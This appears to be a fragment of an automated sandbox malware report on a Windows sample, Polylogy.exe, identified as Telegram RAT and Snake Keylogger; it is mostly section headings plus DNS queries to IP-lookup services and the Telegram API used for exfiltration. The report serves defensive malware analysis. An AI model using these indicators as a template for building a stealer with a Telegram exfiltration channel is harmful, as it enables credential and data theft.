Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Polylogy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Polylogy.exe